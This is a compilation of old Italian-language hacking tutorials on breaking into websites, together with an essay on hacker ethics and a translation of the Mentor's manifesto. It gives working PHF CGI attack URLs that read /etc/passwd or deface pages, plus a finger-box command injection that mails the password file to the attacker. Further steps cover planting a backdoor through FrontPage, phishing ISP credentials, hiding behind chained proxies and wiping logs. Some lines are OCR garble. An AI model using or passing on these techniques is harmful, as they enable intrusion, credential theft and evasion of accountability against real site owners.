Email per info : vrt__@iol.it 
Ciao a Tutti . 


COME BUCARE UN SITO 


I Browser Attack sono quegli attacchi che vengono portati dal vostro browser,senza particolari 
software.Oltre ai vari attacchi PHF e Query,ci sono anche altri attacchi o varianti di PHF/Query 
Cambiare una pagina web dal tuo browser 

Questa corta sezione descrive la stinga da usare per modificare una pagina web da tuo browser. 
All'indirizzo http://Www.sito.com aggiungiamo la seguente stringa cgi- 
bin/phf?Qalias=x%0a/bin/echo%20 "Crepa Lamer!!!"%20>>filename.html](questa è una variante 
del PHF). Questa stringati permette di scrivere su filename.html e aggiungere "Crepa Lamer!!!" 
devono essere in formato html. Puoi inserire del testo delle immagini o qualsiasi altra cosa tu 
voglia. 

Finger box hacking: 

Diciamo di voler "bucare" un sito tipo www.sito.com(ancora lui...).La prima cosa da fare sara' 
scivere l'URL Http://www.sito.com. Poi aggiungete all'url /cgi-bin/finger in modo da ottenere 
Http://www.aol.com/cgi-bin/finger. Se il finger e' attivo un box dovrebbe apparire per inserire il 
nome della persona su cui eseguire il comando. Se questo avviene tu hai la possibilita' di ricevere il 
file /etc/passwd. La prossima cosa da fare sara' di trovare un mailto sulla web page (faq@sito.com o 
webmaster@sito.com ad esempio). Ora ritorna al box e scrivi: faq@sito.com;/bin/mail 
tuo@indirizzo.org > /etc/passwd ...questa stringa manda a voi una mail da faq@sito.com contenente 
il file delle password(madonna che goduria!!!) 


FrontPage 


Il metodo che citerò adesso serve x inserire una backdoor in un sito che ha le estensioni di 
FrontPage. Per sapere se un sito ha le estensioni di FrontPage: 

O c'è scritto direttamente sulla home page del sito. O guardate L'html della home page,e dovreste 
notare una cosa del genere: 

meta name="GENERATOR" content="Microsoft FrontPage 3.0" 

Apriamo il FrontPage98 o FrontPage Express e clicchiamo su File. Apriamo Front Page Box,poi 
scegliamo la voce Apri Web esistente, mettiamo il sito da hackerare e premiamo OK. Appena 
connessi, se ci chiederà la password dobbiamo lasciar stare,ma se non c'è la chiederà(cosa molto 
probabile),il 50%del lavoro è fatto. Entriamo nella cartella CGI-BIN e facciamo un Up-Load e ci 
mettiamo una backdoor.Andiamo al nostro amato browser,e digitiamo:htto://server_vittima/cgi- 
bin/nome_della_backdoor.exe così facciamo partire la nostra backdoor. Adesso il server non ci darà 
nessuna risposta,e andiamo a vedere subito se la backdoor è stata attivata. Se sì,siamo root. Se 
invece la backdoor non viene attivata, dovete dare il tempo al server di aggiornarsi e far eseguire il 
trojan. 
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===()==Hacker? Magari!==()=== 

Ma cosa è un hacker? E cosa fa in quanto tale? Inutile andare in chat e vantarsi di essere hacker 
perchè sappiamo usare Bo o NetBus oppure arrivare la sera e chiedere aiuto per bucare server senza 
neppure sapere cosa e' un exploit. In questo testo cercherò, anche se l'argomento è molto ampio e 
difficile, di chiarire le idee. 


La definizione più ampia che possiamo dare di hacker è un esperto di qualunque genere. Per 
esempio uno potrebbe essere un hacker della musica. Entrando più nel dettaglio, considerando il 
settore che ci interessa possiamo definirlo come un individuo che passa il suo tempo e si appassiona 
nell'esplorare da cima a fondo il mondo informatico al contrario della maggior parte degli utenti 
comuni, che preferiscono imparare solo il minimo necessario, che non si preoccupano di sapere il 
"perchè" delle cose, ma si limitano solo a usufruire della pappa pronta. Ma non è ancora abbastanza 
possiamo integrarla definendo l'hacker uno che prova piacere nella sfida intellettuale e cerca in tutti 
i modi di superare i suoi limiti. 

E' una definizione senza dubbio vera, ma non è abbastanza. Bisogna dire che hacker si diventa solo 
dopo MOLTO TEMPO durante il quale ci siamo tuffati in uno studio immenso per imparare i 
linguaggi di programmazione e tutti i segreti della rete, se non cercando di scoprirne altri. 


E cosa molto importante, gli hacker seguono un'ETICA ben precisa. 

Gli hacker non hakkano server per distruggere tutto, penetrare un sistema non viene visto 
dall'hacker come un atto criminale, ma come una sfida. L'idea non e' di danneggiare la "vittima", ma 
cercare e scoprire il mezzo per penetrare le sue difese. Quando una persona danneggia a fondo un 
sito in cui è penetrato NON si tratta di un hacker, ma piuttosto di un cracker o di un lamer. 

I cracker sono persone che hanno una certa conoscenza informatica ma la usano a scopi distruttivi, 
mentre i lamer sono persone che utilizzano le loro scarse conoscenze per danneggiare gli altri. I 
lamer sono dei perdenti. 

Altro punto fondamentale dell'etica hacker è la convinzione che la condivisione delle informazioni 
sia una cosa buona e positiva, anzi essenziale per la progressiva maturazione del settore. Poi ci sono 
alcuni accorgimenti che devono essere seguiti se ci teniamo alla buccia, come il non parlare a 


nessuno dei progetti futuri (solo a chi affideresti la tua vita), o non bucare siti come la nasa se non 
hai una tattica infallibile al 100% e un buon motivo. 


Non credete a questo che ho detto? Pensate che non esista hacker capace di seguire questa etica? 
Pensate all'hacker più famoso del mondo, Kevin Mitnick! Nelle sue mani aveva migliaia di numeri 
di carte di credito validi...e lui non ha mai toccato un soldo SEBBENE AVESSE POTUTO 
BENISSIMO FARLO. 


Io ho detto cosa penso e in cosa credo, poi fate voi. Per concludere incollo qui sotto la traduzione di 
uno dei più belli scritti sull'hacking che abbia mai letto, il mentor's manifesto. LEGGETELO 
ATTENTAMENTE! 


Un altro e' stato preso oggi, e' su tutti i quotidiani: "teenager Arrestato per Scandaloso Crimine 
Informatico", "Hacker arrestato dopo essersi infiltrato in una banca"... 


Dannati ragazzi. Sono tutti uguali. 

Ma avete voi, nella vostra psicologia da 4 soldi e la mentalità anni '50, avete voi mai guardato oltre 
gli occhi di un hacker? Avete mai pensato a cosa sia scattato in lui, quali forze l'abbiano 
modellato, cosa potrebbe averlo plasmato? 


Sono un hacker...entrate nel mio mondo 
Il mio e' un mondo che inizia con la scuola...Sono più brillante della maggior parte degli altri 
ragazzi, questa schifezza che ci insegnano mi annoia 


Dannato sottosviluppato. Sono tutti uguali. 
Sono alle superiori. Ho ascoltato i professori spiegare per la cinquantesima volta come ridurre una 
frazione. L'ho capita. "No, Sig.ra Smith, Non ho scritto il mio compito. Ce l'ho tutto nella mente..." 


Dannato ragazzo. Probabilmente l'ha copiato. Sono tutti Uguali. 

Ho fatto una scoperta oggi. Ho trovato un computer. Aspetta un secondo. Fa quello che gli dico io. 
Se fa errori, è perché l'ho impallato io. Non perché io non gli piaccio...O perché si sente minacciato 
da me...O perché pensa che io sia uno stupido sciocco...O perché non gli piace insegnare e pensa 
che non dovrebbe essere qui... 


Dannato ragazzo. Tutto ciò che fa e' giocare coi videogames. Sono tutti uguali 

E poi e' successo...una porta si e' aperta sul mondo...scorrendo attraverso le linee telefoniche come 
l'eroina attraverso le vene di un tossico, un impulso elettronico e' spedito, ho trovato un rifugio dalle 
incompetenze di tutti i giorni...ho trovato un mio nascondiglio. 


"E' questo...Questo e' il posto a cui appartengo..." 
Conosco tutti qui...anche se non li ho mai conosciuti, non ci ho mai parlato di persona, anche se 
potrei non sentirli più un giorno...vi conosco tutti... 


Dannato ragazzo. Collegato ancora alla linea telefonica. Sono tutti uguali.. 

Potete scommetterci il culo che siamo tutti uguali... A scuola siamo stati imboccati con cibo da 
bambini quando eravamo affamati di bistecca...i morsi di carne che ci avete fatto ingoiare erano 
premasticati e senza gusto. Siamo stati comandati da sadici, o ignorati dagli apatici. I pochi che 
hanno avuto qualcosa da insegnarci ci hanno trovato ragazzi pieni di volontà, svegli, ma quei pochi 
sono come gocce d'acqua nel deserto. 


Questo e' il nostro mondo ora...il mondo dell'elettrone e dello switch, della bellezza del baud. 
Facciamo uso di un servizio preesistente senza pagare per quello che potrebbe essere a prezzo 
bassissimo se non fosse controllato da ingordi approfittatori, e VOI ci chiamate criminali. Noi 
esploriamo...e ci chiamate criminali. Noi esistiamo senza un colore di pelle, senza nazionalità, senza 
pregiudizi religiosi...e ci chiamate criminali. Voi costruite bombe atomiche, intraprendete guerre, 
uccidete, truffate, e ci mentite e cercate di farci credere che e' solo per il nostro bene, 

e i criminali siamo ancora noi. 

Si sono un criminale. Il mio crimine e' la curiosità. Il mio crimine e' giudicare la gente da come 
parla e pensa, non da come si presenta. Il mio crimine e' di mettervi nel sacco...una cosa per cui voi 
non mi perdonerete mai. 


Sono un hacker, e questo e' il mio manifesto. Potete fermarne uno, ma non potete fermarci tutti... 
Dopotutto, siamo tutti uguali. 


ADESSO RILEGGETELO ANCORA! POI, SE AVETE INTENZIONE DI DIVENTARE 
HACKER, STAMPATELO E ATTACCATELO IN CAMERA! 


Adesso passiamo alla seconda questione. Inutile decidere in 10 minuti di bucare un sito. Hakkare un 
sever è una cosa difficile e lunga, oltre che illegale. Senza dubbio prima di volere hackerare bisogna 
conoscere alcuni concetti base, che tenterò di spiegare, e avere una strategia precisa. 

Molto importante, anche se viene spesso sottovalutato, e la ricerca di informazioni sul sito che 
vogliamo bucare. Questa dunque è la prima cosa che dobbiamo fare: 


==()==RECUPERO DI INFORMAZIONI==()=== 

Le informazioni fondamentali che dobbiamo avere per forza riguardano il sistema operativo usato, 
le porte aperte, l'indirizzo IP. 

I sistemi operativi per eccellenza sono Unix e Windows NT. Entrambi hanno errori (i bug) che gli 
hacker sanno sfruttare per impadronirsi del sito. L'obbiettivo di un hacker quando hakka un server è 
ottenere i privilegi "root", il root può fare qualunque cosa. Dunque root=dio su quel sistema. Dopo 
che è riuscito ad ottenere i privilegi root deve seguire una serie di operazioni che vedremo più 
avanti. Ritorniamo ai sistemi operativi! Come facciamo a sapere quale usa il sito? Senza dubbio il 
metodo più semplice è il "social engineering". Semplicemente questo metodo consiste nello 
spacciarsi per un'altra persona. In questo caso faremo finta di essere un utente di livello medio- 
basso e gli manderemo una e-mail con scritto qualcosa del tipo: 

"sono rimasto molto ben impressionato dal tuo sito, mi piacerebbe crearne uno anche a me e vorrei 
sapere con che programma è stato creato, se ha usato effetti particolari e QUALE SISTEMA 
OPERATIVO USA!" 

Naturalmente questo metodo non funziona sempre. Se l'amministratore del sito ha un minimo di 
cervello vi risponderebbe che sono informazioni riservate per la sicurezza del sito. A quel punto 
passiamo al secondo metodo, cioè facciamo un bello scanning. Uno scanning consiste nell'usare un 
programma che verifica le porte di un dato indirizzo dicendo quali sono aperte e che servizi 
svolgono le varie porte. Programmi adatti allo scopo sono: NMAP per linux e Security Shadow 
Scanner per windows, entrambi reperibili all'indirizzo http:\\www.res3t.cjb.net. 

Dopo avere avviato lo scanning vi appariranno molte righe fra le quali: 


Port 21 found. Desc='ftp' 

Port 23 found. Desc='telnet' 

Port 25 found. Desc='smtp' 

Port 111 found. Desc='portmap/sunrpc 


Port 79 found. Desc='finger" 

Port 513 found. Desc='login/who' 
Port 514 found. Desc='shell/syslog' 
Port 474 found. 

Port 1225 found. 

Port 2049 found. Desc='nfs' 


Da queste poche righe è possibile capire quale sistema operativo sfrutta quel sito. Infatti i servizi 
offerti da Unix e Windows NT sono diversi. Per esempio sulla porta 23 risulta attivo Telnet (Port 23 
found. Desc='telnet') e noi sappiamo che in generale windows NT non iclude telnet, quindi 
dovrebbe essere un sistema Unix. Questa ipotesi è avvalorata anxhe dalla presenza sulla porta 79 di 
finger. Di solito i server windows NT hanno la porta 139 aperta. 


Per trovare l'IP basta usare un programma che trovate incluso nel vostro windows. Andate in 
prompt di MS Dos e scrivete: 

C:\windows> ping sito.com 

e dovrebbe venire scritto l'Ip. Se poi provate con telnet (altro programma di windows, se non sai 
cosa è scarica il testo su telnet su www.res3t.cjb.net) a collegarvi all'Ip dovrebbe dirvi il sistema 
operativo con relativa versione! 


Adesso che sapete quasi tutto quello che serve sul sito passiamo alla ricerca di informazioni sul 
proprietario! Infatti se siamo fortunati troviamo la password per accedere al sito senza tanti 
problemi! Cercate di informarvi, tramite il social engineering o quello che volete, del nome e 
cognome suo, della donna e dei figli, la squadra del cuore, il giocatore preferito, cantante preferito, 
ecc.. Infatti in molti casi le persono usano password in relazione alla lora vita normali. Se proprio si 
tratta di un amministratore stupido l'username coincide con la password! Per esempio l'username 
può essere pippo e la pass pippol. 

Fatto anche questo possiamo smettere di prender informazioni. 


===()==Anonimità==()=== 

Dopo aver scoperto il sistema operativo e le varie porte del sito dovrete dedicarvi alla ricerca di un 
exploit apposito. Ma prima di parlare di questo devo accennare ad un problema molto importante. 
Infatti da qui in poi devi OBBLIGATORIAMENTE renderti anonimo. Hakkare siti è un reato 
penale e non devi in nessun modo lasciare tracce che conducano a te. 

Come saprai ogni volta che ti colleghi ad internet ti viene assegnato un numero chiamato IP (Iternet 
Protocol) del tipo 112.43.189.231 che ti rende rintracciabile molto facilmente. Per avere un tasso di 
anonimità abbastanza elevato bisogna in qualche modo camuffare questo numero in modo da essere 
introvabili. Esistono varie tecniche più o meno raffinate per farlo. A livello base possiamo usare 
proxy o wingate. Se non sapete cosa sono vi consiglio vivamente di studiarlo (potete trovare testi 
adatti su http://www.res3t.cjb.net) se non volete finire col culo al fresco. Comunque il 
funzionamento base di proxy e wingate è molto simile, prima di connetterti al sito da bucare devi 
collegarti al proxy o allo wingate in modo da usare il loro IP invece che il tuo. Schemino per 
chiarire le idee: 


NOI -------- > Sito (il sito ha il nostro IP) 
Questo schemino rappresenta ciò che avviene a cose normali. Noi ci connettiamo ad un sito e 


questo logga (registra) il nostro IP e se noi facciamo dei danni siamo facilmente rintracciabili. Se 
invece usiamo uno wingate o un proxy: 


NOI -------- > Wingate/proxy --------- > Sito (il sito ha l'Ip del wingate o del proxy) 


Praticamente noi ci connettiamo allo wingate o al proxy e poi al sito utilizzando l'Ip di questi. 
Naturalmente se ne usate uno solo la vostra anonimità non è molto elevata. Per hakkare un server 
dovete quantomeno usarne 4 o 5, ma ricordatevi che non sarete mai al sicuro. Per sapere come usare 
proxy e wingate vi ripeto di leggere altri testi, è molto importante. 


Un altra cosuccia da fare che ci garantirà un altra goccia di anonimità e connettersi ad internet 
usando l'account di qualcun altro. Praticamente dovete riuscire a scovare l'username e la password 
di connessione ad internet di un altro utente e di usare questo al momento dell'hakkaggio. Il come 
fare non è compito specifico di questo testo ma vi darò delle dritte. La cosa più semplice è ricorrere 
ancora una volta al caro "social engineering" cioè lo spacciarsi per un altra persona. Per esempio 
potete farvi una casella e-mail del tipo clubnet@usa.net e mandare una e-mail alla vittima dicendo 
di essere della mamma telecom e richiedete nella stessa e-mail l'username e la password. Come 
motivo potete mettere perchè la tim sta cambiando registro informatico e serve l'autorizzazione per 
effettuare il trasferimento...poi mettete che se i dati non verranno inviati la connessione non 
riusulterà più valida e così via. In questa tecnica bisogna dare sfoggio alla nostra fantasia. Altri 
metodi sono più complicati e dovete ricorrere all'uso di un trojan (di solito i trojan sono usati dai 
lamer...) o roba del genere. Se avete il contatto fisico con il PC della vittima (cioè potete mettere le 
mani sul suo piccì) è tutto più semplice, basta che andate su http://www.res3t.cjb.net e vi scaricate 
nella sezione programmi il programma semplice semplice fatto da me: PCcheck. Le istruzioni sono 
all'interno del file. 


Adesso per questo testo ho chiuso con l'anonimità, io ho citato solo alcuni metodi più importanti, 
ma spero di avervi fatto capire che essere anonimi è una cosa FONDAMENTALE. Quindi non mi 
stancherò mai di dirvi di approfondire questo argomento con altri testi. 


===()==Exploit & Log==()=== 

Come ho accennato prima, dopo avere carpito informazioni al sito-vittima bisogna trovare l'exploit 
adatto. L'exploit non è l'unico metodo per penetrare un sistema ma a mio avviso è il più semplice e 
sicuro. Cosa è un exploit? Un exploit è un'applicazione che ci permette di ottenere i privilegi root 
(di cui ho già parlato). 

Per usarli dobbiamo lanciarli dal sito dove si sta hakkando. Ci sono molti tipi di exploit. Ognuno 
sfrutta un bug diverso del sistema usato dal sito. Ogni versione del sistema operativo ha i suoi bug e 
quindi noi dobbiamo cercare l'expolit adatto...con un pò di pazienza e preparazione ci dovremmo 
riuscire. Alcuni scanner danno dopo la scannerizzazione anche l'exploit da sfruttare. E se cercate 
bene credo che esistano programmi appositi, ma la migliore cosa da fare è cercare manualmente. 
Quando siete dentro? Fate quello che volete, ma la cosa più grande è la soddisfazione immensa che 
ti scorre nelle vene. Naturalmente è inutile bucare server Unix se non sapete neppure cosa è e non 
conoscete i comandi. Andate sul mio sito sezione linux (non è proprio la stessa cosa...)! 


Adesso passiamo ai log, che sono tutta un'altra cosa. I log sono dei file che registrano il passaggio 
degli utenti naturalmente con il relativo IP. Questi sono uno dei motivi per cui è fondamentale 
camuffare l'Ip. Con un pò di esperienza è possibile trovare i log e modificare il contenuto in modo 
da non farci trovare. Ma possono esserci log nascosti o che non è possibile raggiungere...ragazzi, 
nascondetevi l'IP! E poi se per caso non riusciste ad ottenere l'accesso root vi è impossibile 
cancellare i log e il padrone del sito potrebbe risalire a chi ha tentato di hackerarlo. Adesso 
scordatevi che io mi metta qui ad elencare i più usati tipi di log e come modificarli...magari in un 
altro testo. 


Dopo aver bucato con successo un server NON dovete assolutamente cancellare tutto o casini di 
questo genere. Se lo fate sarete etichettati come lamer. Se proprio non resistete a non fare niente 
potete cambiare la pagina iniziale con una senza link con scritto "Hacked by Reset" o come è il tuo 
nick. Inoltre la cosa migliore da fare, da vero hacker, è creare un file di testo, oppure mandare un e- 
mail, al creatore del sito, dove spieghi come hai fatto ad entrare ed eventualmente dirgli come 
corregere l'errore. Potete fare anche entrambe le cose. Se hakkate un sito importante (cosa 
sconsigliata) e volete mantenere l'accesso potete piantarci una shell, una backdoor ecc. Per sapere 
come si fa vi consiglio di leggere altri testi. L'hacking è soprattutto STUDIO. 


Adesso ho finito. Spero di avere chiarito qualche idea. Mi raccomando di non mettere subito in 
pratica. Prima dovete approfondire al massimo! 

Cercate altri testi riguardanti gli argomenti che ho accennato. Questo testo non vuole essere una 
guida all'hacking di server, ma una specie di filo logico della teoria da seguire. Un grazie ad "Elf 
Qrin" per alcuni spunti presi dal suo testo per quanto riguarda la prima parte. 


PER QUALSIASI BISCHERATA, CHIARIMENTI, INSULTI, COMPLIMENTI, FOTO PORNO, 
MANDATE UNA E-MAIL A: reset@meganmail.com 


INUTILE DIRE CHE FAVORISCO LA DIFFUSIONE DEL TESTO...BASTA CHE NON 
CAMBIATE IL NOME DELL'AUTORE... 


PERILAMER 


Salve, questa sezione di Systemdown sara' (forse) snobbata da molti. Non mi 
riterro' offeso da un tale atteggiamento solo perche' so che verra' comunque 
letta, magari di nascosto... :) 


Perche' un articolo di cosi' basso livello? In una cosi' bella rivista??? 

Le risposte possono essere diverse: la prima e' che sono un gran lamer 

e, per scimmiottare i pirati veri, mi occorreva una pubblicazione :) 

un altra e' che frequento hackers.it su IRCnet e su quel canale si 

accumulano tante di quelle esperienze sul laming da fare schifo... 

o ancora: molti di noi (noi lamers) vorrebbero iniziare a molestare i 

sistemi remoti partendo da conoscenze pressocche' nulle, e da quella merda di 
w1N95 (a proposito un buon lamer parla male di win95 anche se conosce solo 
quel S.O. anzi la cosa migliore e' usarlo con lo sfondo pieno di scritte tipo: 
"mIcROzofT SuX" ecc., sono fondamentali anche i caratteri cosi',in 
particolare il 3 al posto della E e lo 0 al posto della O) ma spesso ci viene 
negata 

anke (la K al posto del ch) questa soddisfazione. 

La domanda piu' frequente che pone un lamer e': "come si diventa hackers?" 
La risposta piu' frequente che riceve: "installati linux... e quando 

impari ne riparliamo...", in genere chi risponde cosi' e' uno molto piu' 

lamer dell'interlocutore, ha una slack v.1.2.xx installata malissimo e non 
riesce neanche ad avviarla... la risposta corretta e': "inizia a truccarti il 
motorino: e' fare hacking anche quello..." 


Comunque... veniamo al dunque... 

Per la serie "ce volemo diverti' ppure noi" vediamo cosa si puo' 

combinare con un wINd0z3 e un pentium (o anche meno) ed una semplicissima 
connessione a 33.6 con tin o iol (o anche meno II). 

Per prima cosa vi occorre qualche programma (non rompete col reperimento, 
usate qualche motore di ricerca!!!): 


-Un browser (Netscape va benissimo, i.expl. un po' meno: mIcROZofT 
SUX:))) 

-John (o jackpot o starcrack o altri ancora per decriptare le pwd) 

-un Port Scanner (Netcop o similare per analizzare le porte) 

-un client telnet (CRT e' uno dei migliori ed e' freeware(?) ciao 
xOANON:)) 


Passiamo all' azione... 

Esiste un vecchio bug nella sicurezza delle macchine collegate in rete, 

molto conosciuto, ma che, essendo i sysop anch'essi dei lameroni, in qualche 
sito funziona ancora egregiamente, in particolare quelli con dominio .it :). 
Aprite il vostro browser, col mouse selezionate l'area dove compare 

l'url (eheh sembro un manuale PCfacile:) e digitate, senza pensare cosa possa 
voler dire, anzi non digitate neanche...fate un copia e incolla che e' 
piu'semplice, con questa FORMULA MAGICA: 


http://www.domainchevogliohackerare.com/cgi-bin/phf?Qalias=x%0a/bin/cat 


%20/etc/passwd 


Naturalmente sostituite il www.ecc.. (siamo lamerZ ma non aprofittiamone...), 
se il sito e' un po' curato, e il sysop legge phrack, vi dovrebbe 

apparire uno squallido FILE NOT FOUND o una bellissima scritta ACCESS DENIED, 
che 

vuol dire piu'o meno lo stesso ma e' molto piu' c001 (o keWl]) da raccontare 
agli amici. 

Se chi gestisce il sito e' lamerazzo peggio di voi, e legge Il Tromba, 
dovrebbe apparirvi una pagina di testo con delle scritte strane... 

Okkio!!! 

quello e' il file delle passwords: salvatelo!!! 

Poi datelo da mangiare al vostro cracker preferito (john p.e., per l'uso 

vi rimando a numeri precedenti di systemdown...) 

Quando avete ottenuto la pass di un superuser, avviate il vostro port 
scanner preferito, puntato sull'url akkato in precedenza, dovrebbe darvi una 
lista con circa una quindicina di numeri (le porte:)), segnateli in un 
post-it!!! 

Poi avviate il client telnet inserite il dns, indirizzatelo su ognuno di 

quei numeretti del post-it e iniziate a premere invii, punti di domanda, 
ctrlA-Z, ctrl0-9 e tutto quant'altro vi viene in mente, finche' non vi appare 
una 

bella maschera con scritto USER: o LOGIN:...Qui inserite il login e la pass 
ottenuti in precedenza e... BINGO! 

Siete dentro! ovvero siete dei VERI HACKERS!!!! 

(imparare cosa sia una shell o un daemon e come funzionano e' un altro 
discorso, ma voi fregatevene... ormai siete r00t in un altro sistema! 

Potete dirlo in IRC, dedicargli una home page, spararlo nelle news, 
raccontarlo sul vostro BBS, scriverlo sui muri, ecc...) 


Ora... se avete resistito sino a questo punto (della lettura intendo) 

dubito che riusciate ad andare oltre (nel sistema remoto intendo). 

Pero' se, sempre come prevedo, riuscirete a fare qualche inutile danno, 

o perlomeno a farvi tracciare, c'e' la speranza che vi arrestino cosi' per 

un po' state lontani da internet e dal modem, il che' non puo' farvi (e 

farci) che bene, senza contare che poi, con un po' di fortuna, quando uscite 
da galera, vi chiama Maurizio Costanzo o Format e vi fanno vedere in TV, in 
una puntata dedicata alla pedofilia in rete. 

Forse e' meglio continuare a fare i lamerZ.... 

... meditate. 


Ciao a tutti e... happy hacking! 
anzi ...bYeZ e happy laming!!!! :))) 


Titolo: Cosa fare prima di hackerare un server 


Autore: Screener_it 

email: screener_it@freemail.it 

web site: http://go.to/tankcommandos 

colonna sonora: Infinito - Litfiba (quando c'era ancora Pelù !!) 
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QUESTO TESTO DEVE INTENDERSI COME PURAMENTE INFORMATIVO, PERCIO' 
SCREENER._ it, DECLINA OGNI RESPONSABILITA' DALL'USO CHE POTREBBE 

ESSERNE FATTO. L'AUTORE, DUNQUE, NON INCORAGGIA CHI VOLESSE SERVIRSENE 
PER SCOPI ILLEGALI. 


3 AE Ae Ae e e SE AE Ae Ae Sie E SE Ae Ae ie Sie SE SE Ae Ae Sie Sie SR AE Ae Ae Sie Se SE Ae Ae e Sie e SR Ae Ae ie Sie SE Ae Ae Sie Se E AE Ae Ae Sie SR AE Ae e e RR A A RARA AAA 


Ciao a tutti. 

Eccovi un altro testo uscito dalla mia mente sempre (?) in fermento !!! 

Oggi parleremo di quello che si dovrebbe fare prima di hackerare un server. 

Infatti molti credono che si possa hackerare un server in 5 minuti, usando un 

paio di bug. 

Se per un paio di server questo può essere vero, non lo è per tutti. 

Al massimo potete farlo con qualche server sudcoreano o giù di lì. In Europa (men che 
meno in America) non potete. Per hackerare serve un paio, una strategia ben 
pianificata e una coscienza chiara di quello che volete fare. 

Ad esempio, se riusciste ad entrare in qualche bel computer Un*x e riusciste ad 
aprirvi una backdoor, ma al momento di uscire non sapeste come cancellare i file 
log perchè non conoscete bene il sistema restereste fregati. Quindi un'azione prima 
di tutto va studiata e pianificata. 


Questa non vuole assolutamente essere una guida, ma piuttosto un testo di base, 
per capire cosa dovete fare prima di hackerare. 


La cosa più fondamentale è STUDIARE (quante volte ve l'hanno detto ?). 

E' inutile sapere che il server che volete hackerare usa un sistema Un*x, se poi 

non sapete neppure un comando di Un*x. 

La seconda cosa è avere un obiettivo che sia alla portata delle vostre conoscenze. 

La più grande cazzata che possiate fare è credere che dopo aver aver studiato un paio 

di comandi di Un*x e di Win NT e dopo che avete trovato un po' a possiate hackerare 

la Nasa (www.nasa.gov). 

Per due motivi: 

1.- Di sicuro la Nasa non si fa fregare da novellini come voi (e come me ;-) 

2.- In TUTTE le guide che troverete leggerete che è meglio evitare di hackerare 

siti che finiscono in *.gov (governativi americani) e *.mil (militari, sempre americani). 

Se solo fate uno scanning delle porte di questi siti vi trovate con l'FBI a casa (esagero, però 

si corrono rischi ENORMI !!!). 

La terza cosa è pianificare. Quando riuscite a entrare in un server dovete già sapere cosa volete 
fare. Non potete trovarvi lì senza un idea precisa. 

La quarta (e più importante) cosa è prendere informazioni del server che volete hackerare. 

La quinta (non meno importante) è recuperare più informazioni possibili sul webmaster del sito e 
sugli utenti. 


Potete infatti sperare di hackerare un server quando non sapete niente su di lui ? 
Bene, vediamo le informazioni che dobbiamo riuscire a prendere: 


-tipo di sistema operativo (Un*x, Win NT) 
-eventuali porte aperte 

-eventuali demoni attivi sulle porte 
-eventuale server FTP 

“ecc... 


Dato che il 99,9 % di voi che state leggendo questo file usate Win (lo so dovrei dirvi che dovreste 
passare a Linux.. Promettetemi di farlo !!) vi spiegherò come fare hacking tramite Win... Anche se 
non dovrei.. 
biclaialatoloalcicicicioiatatarazaloloioiciciciai ii icicicicicicicici ii iiiicicicicioi ii iicicivicici iii 
piccola considerazione personale: molti vi consiglieranno di passare a Linux, centinaia di siti 
parlano di Win come fosse una merda.. Bhè, provate a guardare i file sorgenti delle pagine HTML 
di numerosi di hacking (italiani e non). Noterete una bella scritta in cima tipo: 


<html> 


<head> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> 
<meta name="GENERATOR" content="Microsoft FrontPage 3.0"> 


Mh.. Direi che è una pagina scritta con FrontPage, prodotto della Microsofît.. Il sito da cui ho 
recuperato questa pagina definisce Windows come la più grande merda del pianeta e dice che chi 


usa Win è un lamer di merda.. A voi le conclusioni. 
Se e e e e e e He e e e Ne e e He He e e He He e e e He Ae Ae e He He e e e Ae Ae e He He e Ae e He Ae Ae e He He Ae Ae Ae Ae Ae Ae Ae Ae Ae A AA AAA AA AAA AA AAAAA 


Prima di tutto dobbiamo ottenere l'indirizzo IP del server che intendiamo hackerare.. 

Ok, apriamo il Prompt del Dos e digitiamo 

ping server.it 

(al posto di server.it ci va l'URL [senza www] del vostro obiettivo.) 

Adesso ci troviamo con una videata di informazioni. 

Cosa abbiamo fatto con questo comando ? Nulla di illegale, abbiamo solo mandato un paio di 
pacchetti alla macchina server.it e lei ce li ha rispediti. In questo modo abbiamo ottenuto l'Ip e 
sappiamo anche se il server è lento è veloce. (vedi Network Utilities for Dummies nella sezione 
Guide del Tank Commandos). 

Annotiamoci l'Ip. (è importante avere un foglio vicino per segnarsi ip, porte, ecc..) e andiamo 
avanti. 


Abbiamo l'Ip.. Che ce ne facciamo ? Devo spiegarvi proprio tutto. Allora, tutti i programmi (0 
buona parte comunque) che userete per fare hacking non riconoscono gli indirizzi tipo litfiba.it, 
offspring.com, ecc.. 

Molti programmi accettano solo indirizzo di tipo numerico (es. 123.456.789 ). 

Quindi segnatevi l'Ip e andiamo avanti. 


Cosa dobbiamo trovare adesso ? Il tipo di sistema operativo. Per fare questo ci sono molti metodi. 
Il più comodo è il social engeering. Scrivete una mail (non dal vostro indirizzo di casa, ma da un 
email free o meglio ancora da un mail non vostra [chi ha orecchie per intendere..]) 
all'amministratore del sito (in genere webmaster@server.it) dicendogli che vorreste creare un sito 


web e dato che il suo vi è parso molto bello e che vi sembra che ci sia un grande grado di 
interattività con l'utente (fate i lecchini) e vi piacerebbe sapere cosa ha usato per creare un sito così 
e SU QUALE SISTEMA OPERATIVO gira. 

Ora, un admin con le palle e serio vi direbbe che non può darvi quelle informazioni xchè ne va della 
sicurezza del sito (giustamente) o addirittura non vi risponderebbe proprio. 

Allora cosa facciamo ? Facciamoci un giro sul sito e vediamo se magari c'è una pagina dove è stato 
scritto che tipo di s.0. (sistema operativo) e quale versione usa il server. Molti webmaster infatti lo 
mettono per vantarsi di saper usare (o di far credere di saper usare) l'ultima versione di Un*x o NT. 
Però vale lo stesso discorso di prima. E allora che si fà ? 


Una delle armi di ogni aspirante hacker (io sono ancora aspirante newbies :-) è la pazienza e la 
tenacia. Ci lasceremo scoraggiare da così poco ? Certo che no !!!! 

E allora che si fa ? 

Semplice, si fa uno scanning delle porte. 

Domanda più che legittima: cosa cazzo è uno scanning delle porte ? 

Siamo qui per imparare e quindi domandate pure se non sapete il significato di certe parole. Non 
fatevi problemi. 

Fare uno scanning delle porte vuole dire avviare un programma che controlla le porte di un dato 
indirizzo e guarda quali sono aperte, ci dice quali servizi offrono le varie porte.. 

Dopo aver fatto il port scan dovrebbe apparirvi una cosa del genere 


Port 21 found. Desc='ftp' 

Port 23 found. Desc='telnet' 

Port 25 found. Desc='smtp' 

Port 111 found. Desc='portmap/sunrpc' 
Port 79 found. Desc='finger' 

Port 512 found. Desc='biff/exec' 
Port 513 found. Desc='login/who' 
Port 514 found. Desc='shell/syslog' 
Port 515 found. Desc='printer' 

Port 474 found. 

Port 1026 found. 

Port 1225 found. 

Port 2049 found. Desc='nfs' 


La forma potrebbe cambiare a seconda dei vari Port Scan che usate, comunque la forma dovrebbe 
essere simile a questa. 

